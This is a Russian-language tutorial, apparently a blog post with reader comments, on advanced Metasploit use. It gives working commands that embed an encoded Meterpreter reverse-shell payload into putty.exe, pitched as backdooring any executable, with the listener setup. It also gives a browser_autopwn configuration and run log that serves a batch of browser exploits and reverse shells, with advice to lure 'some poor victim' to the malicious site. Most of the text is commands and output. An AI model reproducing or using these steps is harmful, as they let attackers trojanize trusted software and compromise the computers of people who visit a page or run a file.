Расширенное использование MSF.
Metasploit Framework настолько универсальный инструментарий для пен-тестера, что у вас не должно вызывать удивления его постоянное расширение в плане функционала. Благодаря открытости MSF, все новшества в плане тестирования на уязвимости достаточно быстро попадают в SVN, но пользователи пакета так-же сами вправе писать собственные модули и использовать их.
Здесь мы поговорим о Browser Autopwn, Karmetasploit, и в качестве цели рассмотрим Mac OS X.
С одной из последних ревизий Metasploit добавлен функционал, который в реальной среде( вне Metasploit) требует не мало времени от атакующего. Возможность вставлять полезную нагрузку Metasploit в любой исполняемый файл(какой вы захотите), делает Metasploit просто находкой. Когда я говорю «любой исполняемый», это значит, любой исполняемый. Вы привыкли качать Backdoor из интернета? Как насчет Iexplorer? Или Explorer.exe или Putty, для нас подойдет любой исполняемый файл. Важным преимуществом здесь будет простота реализации. Ниже описано, как взять любой исполняемый файл и «прикрутить» к нему «нагрузку».
relik@fortress:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.1.132 LPORT=8080 R | ./msfencode -t exe -x /tmp/putty.exe -o /tmp/putty_backdoored.exe -e x86/shikata_ga_nai -c 5 [*] x86/shikata_ga_nai succeeded with size 927 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 1023 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 1093(iteration=3) [*] x86/shikata_ga_nai succeeded with size 1193 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 1248 (iteration=5) relik@fortress:/pentest/exploits/framework3# ./msfcli exploit/multi/handler payload=shikata_ga_nai lhost=10.10.1.231 lport=8080 payload=windows/meterpreter/reverse_tcp E [*] Please wait while we load the module tree... [*] Started reverse handler on port 8080 [*] Starting the payload handler...
Вы «забэкдорили» ваш первый исполняемый файл, после запуска putty.exe можете «наслаждаться» шеллом Meterpreter.
Browser Autopwn.
На Defcon 17, разработчик Metasploit из Египта представила Browser Autopwn для MSF. Одним из преимуществ модуля это выполнение процедуры fingerprinting(дактилоскопия системы и ПО) до запуска эксплоита. Поэтому, если на удаленной системе используется браузер IE6, эксплоит для IE7 применяться не будет. Слайд-презентация из Египта доступна по адресу
Запуск модуля 'server/browser_autopwn' не вызовет никаких проблем, достаточно проделать действия описанные ниже.
msf > use server/browser_autopwn msf auxiliary(browser_autopwn) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.1.101 yes The IP address to use for reverse-connect payloads SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Use SSL URIPATH no The URI to use for this exploit (default is random) msf auxiliary(browser_autopwn) > set uripath / uripath => / msf auxiliary(browser_autopwn) >
Вот и все, что нужно для конфигурации, теперь можно запускать и смотреть на работу модуля.
msf auxiliary(browser_autopwn) > run [*] Auxiliary module running as background job msf auxiliary(browser_autopwn) > [*] Starting exploit modules on host 192.168.1.101... [*] --- ...snip... [*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Using URL: http://0.0.0.0:8080/zCtg7oC [*] Local IP: http://192.168.1.101:8080/zCtg7oC [*] Server started. [*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Using URL: http://0.0.0.0:8080/vTNGJx [*] Local IP: http://192.168.1.101:8080/vTNGJx [*] Server started. [*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Using URL: http://0.0.0.0:8080/abmR33jxStsF7 [*] Local IP: http://192.168.1.101:8080/abmR33jxStsF7 [*] Server started. [*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler ...snip... [*] Started reverse handler [*] Using URL: http://0.0.0.0:8080/RdDDhKANpV [*] Local IP: http://192.168.1.101:8080/RdDDhKANpV [*] Server started. [*] --- Done, found 11 exploit modules [*] Using URL: http://0.0.0.0:8080/ [*] Local IP: http://192.168.1.101:8080/ [*] Server started. Now all we need to do is get some poor victim to navigate to our malicious website and when they do, Browser Autopwn will target their browser based on its version. [*] Request '/' from 192.168.1.128:1767 [*] Request '/?sessid=V2luZG93czpYUDp1bmRlZmluZWQ6ZW4tdXM6eDg2Ok1TSUU6Ni4wO1NQMjo=' from 192.168.1.128:1767 [*] JavaScript Report: Windows:XP:undefined:en-us:x86:MSIE:6.0;SP2: [*] No database, using targetcache instead [*] Responding with exploits [*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.1.128:1774... [*] Sending Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability to 192.168.1.128:1775... [*] Sending Microsoft Internet Explorer Data Binding Memory Corruption init HTML to 192.168.1.128:1774... [*] Sending EXE payload to 192.168.1.128:1775... [*] Sending stage (718336 bytes)
Страниц: 1 2
Автору огромный РЕСПЕКТ за его ТРУДЫ!!!!!!!!!!!!
Жду продолжения